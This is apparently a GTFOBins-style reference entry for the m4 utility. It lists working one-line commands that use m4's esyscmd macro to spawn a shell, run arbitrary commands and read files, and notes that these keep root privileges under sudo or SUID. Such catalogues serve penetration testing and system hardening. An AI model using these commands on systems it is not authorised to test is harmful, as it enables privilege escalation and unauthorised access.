This executable can spawn an interactive system shell.
This function can be performed by any unprivileged user.
echo 'esyscmd(/bin/sh 0<&2 1>&2)' | m4
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
echo 'esyscmd(/bin/sh 0<&2 1>&2)' | m4
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
echo 'esyscmd(/bin/sh 0<&2 1>&2)' | m4
This executable can run non-interactive system commands.
This function can be performed by any unprivileged user.
echo 'esyscmd(/path/to/command)' | m4
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
echo 'esyscmd(/path/to/command)' | m4
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
echo 'esyscmd(/path/to/command)' | m4
This executable can read data from local files.
This function can be performed by any unprivileged user.
m4 /path/to/input-file
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
m4 /path/to/input-file
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
m4 /path/to/input-file